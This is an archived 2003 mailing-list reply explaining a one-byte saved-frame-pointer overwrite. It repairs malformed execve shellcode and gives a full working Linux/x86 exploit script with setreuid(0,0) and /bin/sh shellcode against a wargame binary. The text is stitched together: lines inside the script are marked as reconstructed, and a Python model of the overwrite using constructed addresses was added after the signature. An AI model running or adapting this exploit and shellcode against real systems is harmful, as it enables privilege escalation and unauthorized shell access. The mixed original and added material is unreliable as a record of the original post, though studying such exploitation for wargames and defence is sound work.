Re: Frame Pointer Overwriting
From: Joel Eriksson <je-vulndev(at)bitnux.com>
Date: Sat May 24 2003 - 06:40:05 EDT
On Fri, May 23, 2003 at 10:24:59AM -0700, mike cramp wrote:
Well, what exactly is happening when you overwrite the least significant byte of the saved frame pointer on a little-endian arch? If you actually thought about it, it would be obvious.

main()'s stack frame will be shifted "backwards" (if X > Y) by X-Y bytes, where X is the original LSB of main()'s frame pointer and Y is the overflow byte. Y = 0 will obviously shift the frame by the largest value possible, minimum 0 (if X = 0x00) and max 255 (if X = 0xff). Using Y = 0 will thus maximize the chances of hitting the buffer, as long as X-Y > the distance between main()'s stack frame and the buffer in bob().

> Now since I am researching a remote frame pointer overwrite, I need to
To begin with, that shellcode looks pretty weird.
  [je@vudo ~]$ cat>shellcode.c<<EOF
  ...
   8049390: 6a 0b                push   $0xb
   8049392: 58                   pop    %eax
   8049393: 99                   cltd
   8049394: 52                   push   %edx
   8049395: 68 6e 2f 73 68       push   $0x68732f6e
   804939a: 68 2f 2f 62 69       push   $0x69622f2f
   804939f: e3 52                jecxz  80493f3 <_DYNAMIC+0x47>
   80493a1: 53                   push   %ebx
   80493a2: 89 e1                mov    %esp,%ecx
   80493a4: cd 80                int    $0x80
  ...
  [je@vudo ~]$

Oops, that doesn't look like valid shellcode, does it? What is that jecxz supposed to do there...? But, if we insert a \x89 right before the \xe3, it should work. Then the jecxz 80493f3 turns into a mov %esp,%ebx followed by a push %edx, which will serve your purposes better.

Btw, since the address of buffer is printed to stdout, why don't you use it? Here's an ugly exploit for it where the program is first run to find out the address of the buffer. You'll have to enter the addr yourself, since the address is printed to the buffered stdout and it will coredump before the output is flushed if we pipe it to, for instance, 'sed'. Of course, this can be worked around, but why bother..

  cat > vuln6-xpl.sh << 'EOF'
  #!/bin/sh
  #
  # Linux/x86 exploit for vuln_6 @ dtors.net
  #
  # 2003-05-24 - Joel Eriksson (je at 0xbadc0ded.org)
  #
  # Target binary: first argument if given, otherwise ./6
  [ $# -ge 1 ] && prog=$1 || prog=./6
  shellcode=`
  # setreuid(0, 0)
  printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
  # execve("/bin/sh", "/bin/sh", NULL)
  printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
  printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
  `
  # First run: the program prints the address of its buffer
  $prog `perl -e 'print "A"x256'`
  # The next two lines are missing from the archived copy and are
  # reconstructed from the surrounding text: read the printed address
  # (as a perl numeric literal, e.g. 0x........) typed in by hand, then
  # do the second run with the real payload.
  read addr
  $prog `perl -e '
  # shellcode, padded with "A" to a 4-byte boundary, then the buffer
  # address repeated until the 256-byte buffer is filled
  my $s = '"'$shellcode'"' . ("A" x (4 - length('"'$shellcode'"') % 4));
  print $s . (pack("L", '$addr') x ((256 - length($s)) / 4));
  '`
  EOF

> Thanks,
>
> Mike

--
Joel Eriksson
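The arithmetic behind the frame-pointer discussion above, as an added example that is not part of the original mail. It models the one-byte overwrite of the saved frame pointer on a little-endian machine, computes the X-Y shift, and enumerates which overflow bytes Y would make the shifted frame land inside bob()'s buffer. All addresses (BUF_START, SAVED_FP) are constructed for illustration and are not taken from the vuln_6 binary.

```python
# Added example (not from the original mail): model of the one-byte saved
# frame pointer overwrite described above. All addresses are constructed.

BUF_START = 0xBFFFF6A0   # constructed: start of bob()'s 256-byte buffer
BUF_LEN = 256
SAVED_FP = 0xBFFFF7C8    # constructed: main()'s frame pointer as saved by bob()


def overwrite_lsb(saved_fp, y):
    """Frame pointer after a one-byte overflow replaces its least significant
    byte with y. On a little-endian machine the LSB is the lowest-addressed
    byte of the saved word, so a single overflow byte lands exactly on it."""
    return (saved_fp & ~0xFF) | (y & 0xFF)


def frame_shift(saved_fp, y):
    """X - Y from the mail: X is the original LSB, Y the overflow byte.
    Positive means the frame moves backwards (towards lower addresses)."""
    return (saved_fp & 0xFF) - (y & 0xFF)


def distance_to_buffer(saved_fp, buf_start=BUF_START, buf_len=BUF_LEN):
    """Bytes between the saved frame pointer and the end of the buffer; the
    shift has to exceed this for the shifted frame to reach the buffer."""
    return saved_fp - (buf_start + buf_len)


def hits_buffer(saved_fp, y, buf_start=BUF_START, buf_len=BUF_LEN):
    """True when the shifted frame pointer points inside the buffer, i.e. the
    shift exceeds the distance to the buffer without overshooting its start."""
    new_fp = overwrite_lsb(saved_fp, y)
    return buf_start <= new_fp < buf_start + buf_len


def candidate_bytes(saved_fp, buf_start=BUF_START, buf_len=BUF_LEN):
    """All overflow bytes Y for which the shifted frame lands in the buffer."""
    return [y for y in range(256) if hits_buffer(saved_fp, y, buf_start, buf_len)]


def largest_shift_byte(saved_fp):
    """The Y that produces the largest backwards shift; always 0, as the mail
    says, because X - Y is maximal when Y is 0."""
    return max(range(256), key=lambda y: frame_shift(saved_fp, y))


if __name__ == "__main__":
    x = SAVED_FP & 0xFF
    print("original LSB X = 0x%02x, distance to buffer = %d bytes"
          % (x, distance_to_buffer(SAVED_FP)))
    for y in (0x00, 0x40, 0xA0, x):
        print("Y = 0x%02x: fp -> 0x%08x, shift %4d, hits buffer: %s"
              % (y, overwrite_lsb(SAVED_FP, y), frame_shift(SAVED_FP, y),
                 hits_buffer(SAVED_FP, y)))
    print("%d of 256 overflow bytes land in the buffer; largest shift with Y = %d"
          % (len(candidate_bytes(SAVED_FP)), largest_shift_byte(SAVED_FP)))
```

With these constructed addresses the buffer ends 40 bytes below the saved frame pointer, so any Y with X-Y > 40 reaches it; Y = 0 gives the full 200-byte shift and the most room for error in guessing where the buffer sits.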
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT